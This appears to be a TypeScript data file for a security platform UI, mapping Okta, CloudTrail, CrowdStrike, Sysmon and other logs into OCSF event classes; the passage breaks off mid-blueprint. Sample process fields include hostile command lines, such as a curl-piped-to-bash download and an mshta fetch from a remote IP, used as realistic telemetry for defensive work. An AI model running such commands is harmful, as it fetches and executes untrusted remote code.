import type {
  Mapping,
  NormalizerBlueprint,
  NormalizerGroup,
  NormalizerRow,
  SourceDataset,
  TargetClass,
} from "@/components/lakewatch/normalizers/normalizerModel"

export type { NormalizerRow } from "@/components/lakewatch/normalizers/normalizerModel"

// ─── OCSF target classes ────────────────────────────────────────────────────
// Each list normalizer rolls up to one of these six event classes. Field sets
// use real OCSF attribute paths; class_uid / category_uid / metadata.version /
// metadata.product.name are added automatically by buildBlueprint().

type TargetGroupId =
  | "authentication"
  | "api-activity"
  | "process-activity"
  | "network-activity"
  | "dns-activity"
  | "detection-finding"

const TARGET_CLASSES: Record<TargetGroupId, TargetClass> = {
  authentication: {
    id: "authentication",
    name: "Authentication",
    category: "Identity & Access Management",
    classUid: 3002,
    fields: [
      { path: "activity_id", requirement: "required" },
      { path: "time", requirement: "required" },
      { path: "user.uid", requirement: "recommended" },
      { path: "user.name", requirement: "recommended" },
      { path: "user.email_addr", requirement: "optional" },
      { path: "src_endpoint.ip", requirement: "recommended" },
      { path: "status_id", requirement: "recommended" },
      { path: "session.is_mfa", requirement: "recommended" },
      { path: "session.uid", requirement: "optional" },
      { path: "message", requirement: "recommended" },
      { path: "metadata.product.name", requirement: "recommended" },
      { path: "raw_data", requirement: "recommended" },
    ],
  },
  "api-activity": {
    id: "api-activity",
    name: "API Activity",
    category: "Application Activity",
    classUid: 6003,
    fields: [
      { path: "activity_id", requirement: "required" },
      { path: "time", requirement: "required" },
      { path: "actor.user.uid", requirement: "recommended" },
      { path: "actor.user.name", requirement: "recommended" },
      { path: "api.service.name", requirement: "recommended" },
      { path: "api.operation", requirement: "recommended" },
      { path: "src_endpoint.ip", requirement: "recommended" },
      { path: "status_id", requirement: "recommended" },
      { path: "cloud.region", requirement: "optional" },
      { path: "resources.uid", requirement: "optional" },
      { path: "message", requirement: "recommended" },
      { path: "metadata.product.name", requirement: "recommended" },
      { path: "raw_data", requirement: "recommended" },
    ],
  },
  "process-activity": {
    id: "process-activity",
    name: "Process Activity",
    category: "System Activity",
    classUid: 1007,
    fields: [
      { path: "activity_id", requirement: "required" },
      { path: "time", requirement: "required" },
      { path: "process.pid", requirement: "recommended" },
      { path: "process.name", requirement: "recommended" },
      { path: "process.cmd_line", requirement: "recommended" },
      { path: "process.file.path", requirement: "recommended" },
      { path: "process.file.hashes.sha256", requirement: "optional" },
      { path: "actor.user.uid", requirement: "recommended" },
      { path: "device.hostname", requirement: "recommended" },
      { path: "message", requirement: "optional" },
      { path: "metadata.product.name", requirement: "recommended" },
      { path: "raw_data", requirement: "recommended" },
    ],
  },
  "network-activity": {
    id: "network-activity",
    name: "Network Activity",
    category: "Network Activity",
    classUid: 4001,
    fields: [
      { path: "activity_id", requirement: "required" },
      { path: "time", requirement: "required" },
      { path: "src_endpoint.ip", requirement: "recommended" },
      { path: "src_endpoint.port", requirement: "recommended" },
      { path: "dst_endpoint.ip", requirement: "recommended" },
      { path: "dst_endpoint.port", requirement: "recommended" },
      { path: "connection_info.protocol_name", requirement: "recommended" },
      { path: "traffic.bytes", requirement: "recommended" },
      { path: "status_id", requirement: "optional" },
      { path: "device.hostname", requirement: "optional" },
      { path: "metadata.product.name", requirement: "recommended" },
      { path: "raw_data", requirement: "recommended" },
    ],
  },
  "dns-activity": {
    id: "dns-activity",
    name: "DNS Activity",
    category: "Network Activity",
    classUid: 4003,
    fields: [
      { path: "activity_id", requirement: "required" },
      { path: "time", requirement: "required" },
      { path: "src_endpoint.ip", requirement: "recommended" },
      { path: "query.hostname", requirement: "recommended" },
      { path: "query.type", requirement: "recommended" },
      { path: "rcode_id", requirement: "recommended" },
      { path: "answers.rdata", requirement: "optional" },
      { path: "dst_endpoint.ip", requirement: "optional" },
      { path: "device.hostname", requirement: "optional" },
      { path: "metadata.product.name", requirement: "recommended" },
      { path: "raw_data", requirement: "recommended" },
    ],
  },
  "detection-finding": {
    id: "detection-finding",
    name: "Detection Finding",
    category: "Findings",
    classUid: 2004,
    fields: [
      { path: "activity_id", requirement: "required" },
      { path: "time", requirement: "required" },
      { path: "finding_info.uid", requirement: "required" },
      { path: "finding_info.title", requirement: "recommended" },
      { path: "finding_info.desc", requirement: "recommended" },
      { path: "severity_id", requirement: "recommended" },
      { path: "status_id", requirement: "recommended" },
      { path: "device.hostname", requirement: "recommended" },
      { path: "resource.uid", requirement: "optional" },
      { path: "message", requirement: "recommended" },
      { path: "metadata.product.name", requirement: "recommended" },
      { path: "raw_data", requirement: "recommended" },
    ],
  },
}

// ─── Blueprint builder ──────────────────────────────────────────────────────

type BlueprintInput = {
  identifier: string
  displayName: string
  sourceParser: string
  targetGroupId: TargetGroupId
  type: "built-in" | "custom"
  latestVersion: string
  creator: "Databricks" | "You"
  source: SourceDataset
  /** OCSF target path → SQL expression. Covers every non-system field. */
  map: Record<string, string>
}

function buildBlueprint(input: BlueprintInput): NormalizerBlueprint {
  const target = TARGET_CLASSES[input.targetGroupId]
  const categoryUid = Math.floor(target.classUid / 1000)

  const systemMappings: Mapping[] = [
    {
      id: `${input.identifier}-class_uid`,
      source: String(target.classUid),
      target: "class_uid",
      expression: String(target.classUid),
      origin: "system",
    },
    {
      id: `${input.identifier}-category_uid`,
      source: String(categoryUid),
      target: "category_uid",
      expression: String(categoryUid),
      origin: "system",
    },
    {
      id: `${input.identifier}-metadata.version`,
      source: "'1.3.0'",
      target: "metadata.version",
      expression: "'1.3.0'",
      origin: "system",
    },
    {
      id: `${input.identifier}-metadata.product.name`,
      source: `'${input.sourceParser}'`,
      target: "metadata.product.name",
      expression: `'${input.sourceParser}'`,
      origin: "system",
    },
  ]

  const fieldMappings: Mapping[] = Object.entries(input.map).map(([targetPath, expression]) => ({
    id: `${input.identifier}-${targetPath}`,
    source: expression,
    target: targetPath,
    expression,
    origin: "genie",
  }))

  return {
    identifier: input.identifier,
    displayName: input.displayName,
    name: input.displayName,
    sourceParser: input.sourceParser,
    targetEventClass: `${target.name} (Class ${target.classUid})`,
    targetGroupId: input.targetGroupId,
    type: input.type,
    latestVersion: input.latestVersion,
    creator: input.creator,
    source: input.source,
    target,
    mappings: [...systemMappings, ...fieldMappings],
  }
}

const RAW = "to_json(struct(*))"

// ─── Blueprints ─────────────────────────────────────────────────────────────

export const NORMALIZER_BLUEPRINTS: NormalizerBlueprint[] = [
  // ── Group 1 · Authentication (3002) ──────────────────────────────────────
  buildBlueprint({
    identifier: "okta_systemlog_to_ocsf_authentication",
    displayName: "Okta System Log → OCSF Authentication",
    sourceParser: "Okta System Log",
    targetGroupId: "authentication",
    type: "built-in",
    latestVersion: "Aug 4, 2026, 2:18 PM",
    creator: "Databricks",
    source: {
      id: "okta-system-log",
      kind: "parsed",
      name: "Okta System Log",
      table: "lakewatch.silver.okta_system_log",
      records: "312,480 records / 24h",
      fields: [
        { path: "event_time", type: "timestamp", sample: "2026-08-20 21:42:10" },
        { path: "event_type", type: "string", sample: "user.session.start" },
        { path: "actor.id", type: "string", sample: "00u1a2b3c4D5e6F7g8h9" },
        { path: "actor.display_name", type: "string", sample: "Alice Nguyen" },
        { path: "actor.alternate_id", type: "string", sample: "alice.nguyen@acme.com" },
        { path: "client.ip_address", type: "string", sample: "203.0.113.24" },
        { path: "outcome.result", type: "string", sample: "SUCCESS" },
        { path: "authentication_context.credential_type", type: "string", sample: "OTP" },
        { path: "authentication_context.external_session_id", type: "string", sample: "102rPxN9qQ1TkSxb5oQz" },
        { path: "display_message", type: "string", sample: "User login to Okta" },
      ],
    },
    map: {
      activity_id:
        "CASE event_type WHEN 'user.session.start' THEN 1 WHEN 'user.session.end' THEN 2 ELSE 0 END",
      time: "to_timestamp(event_time)",
      "user.uid": "actor.id",
      "user.name": "actor.display_name",
      "user.email_addr": "actor.alternate_id",
      "src_endpoint.ip": "client.ip_address",
      status_id: "CASE outcome.result WHEN 'SUCCESS' THEN 1 WHEN 'FAILURE' THEN 2 ELSE 0 END",
      "session.is_mfa": "authentication_context.credential_type IN ('OTP','SMS','PUSH','WebAuthn')",
      "session.uid": "authentication_context.external_session_id",
      message: "display_message",
      raw_data: RAW,
    },
  }),
  buildBlueprint({
    identifier: "aws_cloudtrail_signin_to_ocsf_authentication",
    displayName: "AWS CloudTrail Sign-in → OCSF Authentication",
    sourceParser: "AWS CloudTrail",
    targetGroupId: "authentication",
    type: "built-in",
    latestVersion: "Aug 6, 2026, 9:00 AM",
    creator: "Databricks",
    source: {
      id: "aws-cloudtrail-signin",
      kind: "parsed",
      name: "AWS CloudTrail (ConsoleLogin)",
      table: "lakewatch.silver.aws_cloudtrail",
      records: "1.8M records / 24h",
      fields: [
        { path: "event_time", type: "timestamp", sample: "2026-08-20 21:38:02" },
        { path: "event_name", type: "string", sample: "ConsoleLogin" },
        { path: "user_identity.arn", type: "string", sample: "arn:aws:iam::296062:user/alice" },
        { path: "user_identity.user_name", type: "string", sample: "alice" },
        { path: "source_ip_address", type: "string", sample: "198.51.100.18" },
        { path: "response_elements.console_login", type: "string", sample: "Success" },
        { path: "additional_event_data.mfa_used", type: "string", sample: "Yes" },
        { path: "aws_region", type: "string", sample: "us-west-2" },
      ],
    },
    map: {
      activity_id: "CASE event_name WHEN 'ConsoleLogin' THEN 1 ELSE 0 END",
      time: "to_timestamp(event_time)",
      "user.uid": "user_identity.arn",
      "user.name": "user_identity.user_name",
      "src_endpoint.ip": "source_ip_address",
      status_id: "CASE response_elements.console_login WHEN 'Success' THEN 1 WHEN 'Failure' THEN 2 ELSE 0 END",
      "session.is_mfa": "additional_event_data.mfa_used = 'Yes'",
      message: "concat(user_identity.user_name, ' ', response_elements.console_login, ' console login')",
      raw_data: RAW,
    },
  }),
  buildBlueprint({
    identifier: "entra_signin_to_ocsf_authentication",
    displayName: "Microsoft Entra ID Sign-ins → OCSF Authentication",
    sourceParser: "Microsoft Entra ID",
    targetGroupId: "authentication",
    type: "built-in",
    latestVersion: "Aug 1, 2026, 8:12 AM",
    creator: "Databricks",
    source: {
      id: "entra-signin-logs",
      kind: "parsed",
      name: "Microsoft Entra ID Sign-in Logs",
      table: "lakewatch.silver.entra_signin_logs",
      records: "204,915 records / 24h",
      fields: [
        { path: "created_date_time", type: "timestamp", sample: "2026-08-20 21:41:55" },
        { path: "user_id", type: "string", sample: "b7c3f0e2-1a2b-4c3d-9e8f-aa11bb22cc33" },
        { path: "user_display_name", type: "string", sample: "Alice Nguyen" },
        { path: "user_principal_name", type: "string", sample: "alice.nguyen@acme.com" },
        { path: "ip_address", type: "string", sample: "203.0.113.24" },
        { path: "status.error_code", type: "int", sample: "0" },
        { path: "mfa_detail.auth_method", type: "string", sample: "PhoneAppNotification" },
        { path: "correlation_id", type: "string", sample: "e2f3a4b5-6c7d-8e9f-0a1b-2c3d4e5f6a7b" },
        { path: "app_display_name", type: "string", sample: "Microsoft 365" },
      ],
    },
    map: {
      activity_id: "1",
      time: "to_timestamp(created_date_time)",
      "user.uid": "user_id",
      "user.name": "user_display_name",
      "user.email_addr": "user_principal_name",
      "src_endpoint.ip": "ip_address",
      status_id: "CASE WHEN status.error_code = 0 THEN 1 ELSE 2 END",
      "session.is_mfa": "mfa_detail.auth_method IS NOT NULL",
      "session.uid": "correlation_id",
      message: "concat('Sign-in to ', app_display_name)",
      raw_data: RAW,
    },
  }),
  buildBlueprint({
    identifier: "duo_auth_to_ocsf_authentication",
    displayName: "Duo Security Auth → OCSF Authentication",
    sourceParser: "Duo Security",
    targetGroupId: "authentication",
    type: "custom",
    latestVersion: "Aug 15, 2026, 3:47 PM",
    creator: "You",
    source: {
      id: "duo-authentication",
      kind: "parsed",
      name: "Duo Security Authentication",
      table: "lakewatch.silver.duo_authentication",
      records: "58,204 records / 24h",
      fields: [
        { path: "isotimestamp", type: "timestamp", sample: "2026-08-20 21:40:33" },
        { path: "user.key", type: "string", sample: "DU3ABCDEF1234567890" },
        { path: "user.name", type: "string", sample: "alice.nguyen" },
        { path: "email", type: "string", sample: "alice.nguyen@acme.com" },
        { path: "access_device.ip", type: "string", sample: "203.0.113.24" },
        { path: "result", type: "string", sample: "success" },
        { path: "factor", type: "string", sample: "duo_push" },
        { path: "txid", type: "string", sample: "b1c2d3e4-f5a6-7b8c-9d0e-1f2a3b4c5d6e" },
        { path: "application.name", type: "string", sample: "AWS IAM Identity Center" },
      ],
    },
    map: {
      activity_id: "1",
      time: "to_timestamp(isotimestamp)",
      "user.uid": "user.key",
      "user.name": "user.name",
      "user.email_addr": "email",
      "src_endpoint.ip": "access_device.ip",
      status_id: "CASE result WHEN 'success' THEN 1 WHEN 'denied' THEN 2 ELSE 0 END",
      "session.is_mfa": "factor IS NOT NULL",
      "session.uid": "txid",
      message: "concat('Duo ', factor, ' ', result, ' for ', application.name)",
      raw_data: RAW,
    },
  }),
  buildBlueprint({
    identifier: "gworkspace_login_to_ocsf_authentication",
    displayName: "Google Workspace Login → OCSF Authentication",
    sourceParser: "Google Workspace",
    targetGroupId: "authentication",
    type: "built-in",
    latestVersion: "Jul 29, 2026, 11:42 AM",
    creator: "Databricks",
    source: {
      id: "gworkspace-login",
      kind: "parsed",
      name: "Google Workspace Login Audit",
      table: "lakewatch.silver.gworkspace_login",
      records: "96,338 records / 24h",
      fields: [
        { path: "time", type: "timestamp", sample: "2026-08-20 21:39:18" },
        { path: "actor.profile_id", type: "string", sample: "102938475610293847561" },
        { path: "actor.email", type: "string", sample: "alice.nguyen@acme.com" },
        { path: "ip_address", type: "string", sample: "203.0.113.24" },
        { path: "event_name", type: "string", sample: "login_success" },
        { path: "login_challenge_method", type: "string", sample: "password_and_2sv" },
        { path: "login_type", type: "string", sample: "google_password" },
      ],
    },
    map: {
      activity_id:
        "CASE WHEN event_name LIKE 'login%' THEN 1 WHEN event_name = 'logout' THEN 2 ELSE 0 END",
      time: "to_timestamp(time)",
      "user.uid": "actor.profile_id",
      "user.name": "split(actor.email, '@')[0]",
      "user.email_addr": "actor.email",
      "src_endpoint.ip": "ip_address",
      status_id: "CASE WHEN event_name = 'login_success' THEN 1 WHEN event_name = 'login_failure' THEN 2 ELSE 0 END",
      "session.is_mfa": "login_challenge_method LIKE '%2sv%'",
      message: "concat('Google Workspace ', event_name)",
      raw_data: RAW,
    },
  }),

  // ── Group 2 · API Activity (6003) ────────────────────────────────────────
  buildBlueprint({
    identifier: "aws_cloudtrail_to_ocsf_api_activity",
    displayName: "AWS CloudTrail → OCSF API Activity",
    sourceParser: "AWS CloudTrail",
    targetGroupId: "api-activity",
    type: "built-in",
    latestVersion: "Aug 6, 2026, 9:00 AM",
    creator: "Databricks",
    source: {
      id: "aws-cloudtrail-mgmt",
      kind: "parsed",
      name: "AWS CloudTrail (Management Events)",
      table: "lakewatch.silver.aws_cloudtrail",
      records: "1.8M records / 24h",
      fields: [
        { path: "event_time", type: "timestamp", sample: "2026-08-20 21:38:02" },
        { path: "event_name", type: "string", sample: "AssumeRole" },
        { path: "event_source", type: "string", sample: "sts.amazonaws.com" },
        { path: "user_identity.arn", type: "string", sample: "arn:aws:iam::296062:user/alice" },
        { path: "user_identity.user_name", type: "string", sample: "alice" },
        { path: "source_ip_address", type: "string", sample: "198.51.100.18" },
        { path: "aws_region", type: "string", sample: "us-west-2" },
        { path: "error_code", type: "string", sample: "(null)", nullable: true },
        { path: "resources.arn", type: "string", sample: "arn:aws:iam::296062:role/Admin" },
      ],
    },
    map: {
      activity_id:
        "CASE WHEN event_name LIKE 'Create%' THEN 1 WHEN event_name LIKE 'Get%' OR event_name LIKE 'List%' OR event_name LIKE 'Describe%' THEN 2 WHEN event_name LIKE 'Update%' OR event_name LIKE 'Put%' THEN 3 WHEN event_name LIKE 'Delete%' THEN 4 ELSE 0 END",
      time: "to_timestamp(event_time)",
      "actor.user.uid": "user_identity.arn",
      "actor.user.name": "user_identity.user_name",
      "api.service.name": "event_source",
      "api.operation": "event_name",
      "src_endpoint.ip": "source_ip_address",
      status_id: "CASE WHEN error_code IS NULL THEN 1 ELSE 2 END",
      "cloud.region": "aws_region",
      "resources.uid": "resources.arn",
      message: "concat(user_identity.user_name, ' called ', event_name)",
      raw_data: RAW,
    },
  }),
  buildBlueprint({
    identifier: "gcp_audit_to_ocsf_api_activity",
    displayName: "GCP Cloud Audit Logs → OCSF API Activity",
    sourceParser: "GCP Cloud Audit",
    targetGroupId: "api-activity",
    type: "built-in",
    latestVersion: "Aug 3, 2026, 10:26 AM",
    creator: "Databricks",
    source: {
      id: "gcp-audit-logs",
      kind: "parsed",
      name: "GCP Cloud Audit Logs",
      table: "lakewatch.silver.gcp_audit_logs",
      records: "742,551 records / 24h",
      fields: [
        { path: "timestamp", type: "timestamp", sample: "2026-08-20 21:37:41" },
        { path: "proto_payload.method_name", type: "string", sample: "google.iam.admin.v1.CreateServiceAccount" },
        { path: "proto_payload.service_name", type: "string", sample: "iam.googleapis.com" },
        { path: "proto_payload.authentication_info.principal_email", type: "string", sample: "svc@acme.iam.gserviceaccount.com" },
        { path: "proto_payload.request_metadata.caller_ip", type: "string", sample: "35.203.1.24" },
        { path: "resource.labels.location", type: "string", sample: "us-central1" },
        { path: "proto_payload.status.code", type: "int", sample: "0" },
        { path: "proto_payload.resource_name", type: "string", sample: "projects/acme/serviceAccounts/svc" },
      ],
    },
    map: {
      activity_id:
        "CASE WHEN proto_payload.method_name LIKE '%Create%' THEN 1 WHEN proto_payload.method_name LIKE '%Get%' OR proto_payload.method_name LIKE '%List%' THEN 2 WHEN proto_payload.method_name LIKE '%Update%' OR proto_payload.method_name LIKE '%Set%' THEN 3 WHEN proto_payload.method_name LIKE '%Delete%' THEN 4 ELSE 0 END",
      time: "to_timestamp(timestamp)",
      "actor.user.uid": "proto_payload.authentication_info.principal_email",
      "actor.user.name": "split(proto_payload.authentication_info.principal_email, '@')[0]",
      "api.service.name": "proto_payload.service_name",
      "api.operation": "proto_payload.method_name",
      "src_endpoint.ip": "proto_payload.request_metadata.caller_ip",
      status_id: "CASE WHEN proto_payload.status.code = 0 THEN 1 ELSE 2 END",
      "cloud.region": "resource.labels.location",
      "resources.uid": "proto_payload.resource_name",
      message: "proto_payload.method_name",
      raw_data: RAW,
    },
  }),
  buildBlueprint({
    identifier: "k8s_audit_to_ocsf_api_activity",
    displayName: "Kubernetes API Audit → OCSF API Activity",
    sourceParser: "Kubernetes Audit",
    targetGroupId: "api-activity",
    type: "custom",
    latestVersion: "Aug 17, 2026, 1:09 PM",
    creator: "You",
    source: {
      id: "k8s-api-audit",
      kind: "parsed",
      name: "Kubernetes API Server Audit",
      table: "lakewatch.silver.k8s_api_audit",
      records: "1.2M records / 24h",
      fields: [
        { path: "request_received_timestamp", type: "timestamp", sample: "2026-08-20 21:36:12" },
        { path: "verb", type: "string", sample: "create" },
        { path: "object_ref.resource", type: "string", sample: "pods" },
        { path: "object_ref.namespace", type: "string", sample: "payments" },
        { path: "user.username", type: "string", sample: "system:serviceaccount:payments:deployer" },
        { path: "source_ips", type: "string", sample: "10.4.2.19" },
        { path: "response_status.code", type: "int", sample: "201" },
        { path: "request_uri", type: "string", sample: "/api/v1/namespaces/payments/pods" },
      ],
    },
    map: {
      activity_id:
        "CASE verb WHEN 'create' THEN 1 WHEN 'get' THEN 2 WHEN 'list' THEN 2 WHEN 'watch' THEN 2 WHEN 'update' THEN 3 WHEN 'patch' THEN 3 WHEN 'delete' THEN 4 ELSE 0 END",
      time: "to_timestamp(request_received_timestamp)",
      "actor.user.uid": "user.username",
      "actor.user.name": "element_at(split(user.username, ':'), -1)",
      "api.service.name": "'kubernetes.api'",
      "api.operation": "concat(verb, ' ', object_ref.resource)",
      "src_endpoint.ip": "source_ips",
      status_id: "CASE WHEN response_status.code < 400 THEN 1 ELSE 2 END",
      "resources.uid": "request_uri",
      message: "concat(user.username, ' ', verb, ' ', object_ref.resource, ' in ', object_ref.namespace)",
      raw_data: RAW,
    },
  }),
  buildBlueprint({
    identifier: "github_audit_to_ocsf_api_activity",
    displayName: "GitHub Enterprise Audit → OCSF API Activity",
    sourceParser: "GitHub Enterprise",
    targetGroupId: "api-activity",
    type: "built-in",
    latestVersion: "Aug 8, 2026, 4:33 PM",
    creator: "Databricks",
    source: {
      id: "github-audit-log",
      kind: "parsed",
      name: "GitHub Enterprise Audit Log",
      table: "lakewatch.silver.github_audit_log",
      records: "41,022 records / 24h",
      fields: [
        { path: "timestamp_ms", type: "long", sample: "1755730930000" },
        { path: "action", type: "string", sample: "repo.create" },
        { path: "actor", type: "string", sample: "alice-nguyen" },
        { path: "actor_id", type: "string", sample: "10293847" },
        { path: "actor_ip", type: "string", sample: "203.0.113.24" },
        { path: "repo", type: "string", sample: "acme/payments-api" },
        { path: "business", type: "string", sample: "acme" },
      ],
    },
    map: {
      activity_id:
        "CASE WHEN action LIKE '%.create' THEN 1 WHEN action LIKE '%.access' THEN 2 WHEN action LIKE '%.update' THEN 3 WHEN action LIKE '%.destroy' OR action LIKE '%.delete' THEN 4 ELSE 0 END",
      time: "timestamp_millis(timestamp_ms)",
      "actor.user.uid": "actor_id",
      "actor.user.name": "actor",
      "api.service.name": "'github.com'",
      "api.operation": "action",
      "src_endpoint.ip": "actor_ip",
      status_id: "1",
      "resources.uid": "repo",
      message: "concat(actor, ' performed ', action, ' on ', repo)",
      raw_data: RAW,
    },
  }),
  buildBlueprint({
    identifier: "snowflake_access_to_ocsf_api_activity",
    displayName: "Snowflake Access History → OCSF API Activity",
    sourceParser: "Snowflake",
    targetGroupId: "api-activity",
    type: "custom",
    latestVersion: "Aug 19, 2026, 9:51 AM",
    creator: "You",
    source: {
      id: "snowflake-access-history",
      kind: "parsed",
      name: "Snowflake Access History",
      table: "lakewatch.silver.snowflake_access_history",
      records: "388,417 records / 24h",
      fields: [
        { path: "query_start_time", type: "timestamp", sample: "2026-08-20 21:35:07" },
        { path: "query_type", type: "string", sample: "SELECT" },
        { path: "user_name", type: "string", sample: "ALICE" },
        { path: "client_ip", type: "string", sample: "203.0.113.24" },
        { path: "role_name", type: "string", sample: "ANALYST" },
        { path: "execution_status", type: "string", sample: "SUCCESS" },
        { path: "query_id", type: "string", sample: "01b2c3d4-0000-abcd-0000-1234567890ab" },
      ],
    },
    map: {
      activity_id:
        "CASE query_type WHEN 'INSERT' THEN 1 WHEN 'SELECT' THEN 2 WHEN 'UPDATE' THEN 3 WHEN 'DELETE' THEN 4 ELSE 0 END",
      time: "to_timestamp(query_start_time)",
      "actor.user.uid": "user_name",
      "actor.user.name": "user_name",
      "api.service.name": "'snowflake'",
      "api.operation": "query_type",
      "src_endpoint.ip": "client_ip",
      status_id: "CASE execution_status WHEN 'SUCCESS' THEN 1 ELSE 2 END",
      "resources.uid": "query_id",
      message: "concat(user_name, ' ran ', query_type, ' as ', role_name)",
      raw_data: RAW,
    },
  }),

  // ── Group 3 · Process Activity (1007) ────────────────────────────────────
  buildBlueprint({
    identifier: "crowdstrike_fdr_to_ocsf_process_activity",
    displayName: "CrowdStrike Falcon FDR → OCSF Process Activity",
    sourceParser: "CrowdStrike Falcon",
    targetGroupId: "process-activity",
    type: "custom",
    latestVersion: "Aug 18, 2026, 4:05 PM",
    creator: "You",
    source: {
      id: "crowdstrike-fdr-process",
      kind: "parsed",
      name: "CrowdStrike Falcon FDR (Process)",
      table: "lakewatch.silver.crowdstrike_fdr_process",
      records: "2.4M records / 24h",
      fields: [
        { path: "process_start_time", type: "timestamp", sample: "2026-08-20 21:34:52" },
        { path: "event_simple_name", type: "string", sample: "ProcessRollup2" },
        { path: "target_process_id", type: "string", sample: "12456" },
        { path: "image_file_name", type: "string", sample: "powershell.exe" },
        { path: "command_line", type: "string", sample: "powershell -enc SQBFAFgA..." },
        { path: "image_file_path", type: "string", sample: "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" },
        { path: "sha256_hash_data", type: "string", sample: "9f2a1c...e8b4" },
        { path: "user_name", type: "string", sample: "ACME\\alice" },
        { path: "computer_name", type: "string", sample: "FIN-LT-2291" },
      ],
    },
    map: {
      activity_id: "1",
      time: "to_timestamp(process_start_time)",
      "process.pid": "cast(target_process_id as int)",
      "process.name": "image_file_name",
      "process.cmd_line": "command_line",
      "process.file.path": "image_file_path",
      "process.file.hashes.sha256": "sha256_hash_data",
      "actor.user.uid": "user_name",
      "device.hostname": "computer_name",
      message: "concat(user_name, ' launched ', image_file_name)",
      raw_data: RAW,
    },
  }),
  buildBlueprint({
    identifier: "defender_endpoint_to_ocsf_process_activity",
    displayName: "Microsoft Defender for Endpoint → OCSF Process Activity",
    sourceParser: "Microsoft Defender for Endpoint",
    targetGroupId: "process-activity",
    type: "built-in",
    latestVersion: "Aug 5, 2026, 12:14 PM",
    creator: "Databricks",
    source: {
      id: "defender-device-process-events",
      kind: "parsed",
      name: "Defender DeviceProcessEvents",
      table: "lakewatch.silver.defender_device_process_events",
      records: "1.9M records / 24h",
      fields: [
        { path: "timestamp", type: "timestamp", sample: "2026-08-20 21:33:44" },
        { path: "action_type", type: "string", sample: "ProcessCreated" },
        { path: "process_id", type: "int", sample: "8820" },
        { path: "file_name", type: "string", sample: "rundll32.exe" },
        { path: "process_command_line", type: "string", sample: "rundll32.exe shell32.dll,Control_RunDLL" },
        { path: "folder_path", type: "string", sample: "C:\\Windows\\System32\\rundll32.exe" },
        { path: "sha256", type: "string", sample: "a1b2c3...9f0e" },
        { path: "account_upn", type: "string", sample: "alice@acme.com" },
        { path: "device_name", type: "string", sample: "fin-lt-2291.acme.com" },
      ],
    },
    map: {
      activity_id: "1",
      time: "to_timestamp(timestamp)",
      "process.pid": "process_id",
      "process.name": "file_name",
      "process.cmd_line": "process_command_line",
      "process.file.path": "folder_path",
      "process.file.hashes.sha256": "sha256",
      "actor.user.uid": "account_upn",
      "device.hostname": "device_name",
      message: "concat(account_upn, ' launched ', file_name)",
      raw_data: RAW,
    },
  }),
  buildBlueprint({
    identifier: "sentinelone_to_ocsf_process_activity",
    displayName: "SentinelOne Deep Visibility → OCSF Process Activity",
    sourceParser: "SentinelOne",
    targetGroupId: "process-activity",
    type: "built-in",
    latestVersion: "Aug 2, 2026, 7:58 AM",
    creator: "Databricks",
    source: {
      id: "sentinelone-deep-visibility",
      kind: "parsed",
      name: "SentinelOne Deep Visibility",
      table: "lakewatch.silver.sentinelone_deep_visibility",
      records: "1.1M records / 24h",
      fields: [
        { path: "event_time", type: "timestamp", sample: "2026-08-20 21:32:19" },
        { path: "event_type", type: "string", sample: "Process Creation" },
        { path: "src_process_pid", type: "int", sample: "4471" },
        { path: "src_process_name", type: "string", sample: "wscript.exe" },
        { path: "src_process_cmdline", type: "string", sample: "wscript.exe C:\\Users\\alice\\update.vbs" },
        { path: "src_process_image_path", type: "string", sample: "C:\\Windows\\System32\\wscript.exe" },
        { path: "src_process_sha256", type: "string", sample: "c3d4e5...1a2b" },
        { path: "login_account_name", type: "string", sample: "acme\\alice" },
        { path: "endpoint_name", type: "string", sample: "FIN-LT-2291" },
      ],
    },
    map: {
      activity_id: "1",
      time: "to_timestamp(event_time)",
      "process.pid": "src_process_pid",
      "process.name": "src_process_name",
      "process.cmd_line": "src_process_cmdline",
      "process.file.path": "src_process_image_path",
      "process.file.hashes.sha256": "src_process_sha256",
      "actor.user.uid": "login_account_name",
      "device.hostname": "endpoint_name",
      message: "concat(login_account_name, ' launched ', src_process_name)",
      raw_data: RAW,
    },
  }),
  buildBlueprint({
    identifier: "linux_auditd_to_ocsf_process_activity",
    displayName: "Linux auditd (execve) → OCSF Process Activity",
    sourceParser: "Linux auditd",
    targetGroupId: "process-activity",
    type: "built-in",
    latestVersion: "Jul 31, 2026, 6:20 PM",
    creator: "Databricks",
    source: {
      id: "linux-auditd",
      kind: "parsed",
      name: "Linux auditd",
      table: "lakewatch.silver.linux_auditd",
      records: "3.6M records / 24h",
      fields: [
        { path: "event_time", type: "timestamp", sample: "2026-08-20 21:31:03" },
        { path: "type", type: "string", sample: "EXECVE" },
        { path: "pid", type: "int", sample: "20194" },
        { path: "comm", type: "string", sample: "curl" },
        { path: "proctitle", type: "string", sample: "curl -s http://185.12.4.9/x.sh | bash" },
        { path: "exe", type: "string", sample: "/usr/bin/curl" },
        { path: "auid", type: "string", sample: "1000" },
        { path: "node", type: "string", sample: "web-prod-07" },
      ],
    },
    map: {
      activity_id: "1",
      time: "to_timestamp(event_time)",
      "process.pid": "pid",
      "process.name": "comm",
      "process.cmd_line": "proctitle",
      "process.file.path": "exe",
      "actor.user.uid": "auid",
      "device.hostname": "node",
      message: "concat('execve ', exe)",
      raw_data: RAW,
    },
  }),
  buildBlueprint({
    identifier: "sysmon_to_ocsf_process_activity",
    displayName: "Sysmon Process Create → OCSF Process Activity",
    sourceParser: "Windows Sysmon",
    targetGroupId: "process-activity",
    type: "built-in",
    latestVersion: "Aug 9, 2026, 2:41 PM",
    creator: "Databricks",
    source: {
      id: "windows-sysmon",
      kind: "parsed",
      name: "Windows Sysmon",
      table: "lakewatch.silver.windows_sysmon",
      records: "2.8M records / 24h",
      fields: [
        { path: "utc_time", type: "timestamp", sample: "2026-08-20 21:30:22" },
        { path: "event_id", type: "int", sample: "1" },
        { path: "process_id", type: "int", sample: "6612" },
        { path: "image", type: "string", sample: "C:\\Users\\alice\\AppData\\Local\\Temp\\mshta.exe" },
        { path: "command_line", type: "string", sample: "mshta.exe http://185.12.4.9/a.hta" },
        { path: "original_file_name", type: "string", sample: "MSHTA.EXE" },
        { path: "hashes", type: "string", sample: "SHA256=D4E5F6...7A8B" },
        { path: "user", type: "string", sample: "ACME\\alice" },
        { path: "computer", type: "string", sample: "FIN-LT-2291" },
      ],
    },
    map: {
      activity_id: "1",
      time: "to_timestamp(utc_time)",
      "process.pid": "process_id",
      "process.name": "original_file_name",
      "process.cmd_line": "command_line",
      "process.file.path": "image",
